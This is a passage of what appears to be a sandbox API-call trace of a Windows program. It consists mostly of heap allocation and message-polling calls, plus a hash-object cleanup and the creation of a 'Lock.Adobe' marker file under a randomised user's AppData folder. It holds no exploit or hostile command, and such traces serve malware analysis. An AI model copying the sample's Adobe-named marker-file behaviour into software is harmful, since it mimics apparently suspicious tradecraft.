lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0207.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0207.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0207.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0207.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0207.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0207.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0207.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0207.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0207.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0207.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0207.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0207.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0207.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0207.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0207.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0207.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0207.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0207.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0207.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0207.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0207.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0207.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0207.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0207.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0207.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0207.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0207.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0207.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0207.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0207.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0207.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0207.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0207.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0207.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x24b3020 [0207.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0207.735] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0207.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0207.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0207.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0207.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0207.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0207.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0207.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0207.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0207.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0207.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0207.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0207.736] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0207.737] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0207.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0207.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0207.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0207.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0207.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0207.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0207.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0207.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0207.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0207.737] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0207.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0207.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0207.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0207.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0207.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0207.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0207.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0207.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0207.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0207.738] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0207.738] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0207.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0207.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0207.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0207.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0207.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0207.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0207.739] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.739] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0207.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0207.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0207.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0207.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0207.739] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.739] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0207.739] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0207.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0207.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0207.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0207.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0207.740] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0207.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0207.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0207.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0207.740] CryptDestroyHash (hHash=0xaa5760) returned 1 [0207.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x24b2e00 [0207.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0207.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0207.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0207.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0207.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0207.740] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0207.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0207.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.741] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0207.741] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.741] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.741] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0207.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0207.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0207.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0207.741] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Adobe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0207.741] GetLastError () returned 0x5 [0207.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0207.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0207.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0207.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0207.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0207.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0207.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0207.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0207.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0207.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0207.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0207.742] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0207.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0207.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0207.742] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0207.742] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0207.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0207.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0207.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0207.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0207.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0207.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0207.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0207.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0207.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0207.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0207.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0207.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0207.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0207.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0207.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0207.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0207.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x2416270 [0207.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0207.743] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local")) returned 0x2010 [0207.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0207.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0207.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0207.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24b7a48 [0207.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0207.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0207.744] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Lock.Adobe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\lock.adobe"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0207.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0207.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0207.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0207.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0207.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0207.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0207.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0207.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0207.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0207.745] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0207.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0207.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0207.745] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0207.745] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0207.745] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0207.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0207.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0207.745] RtlAllocateHeap 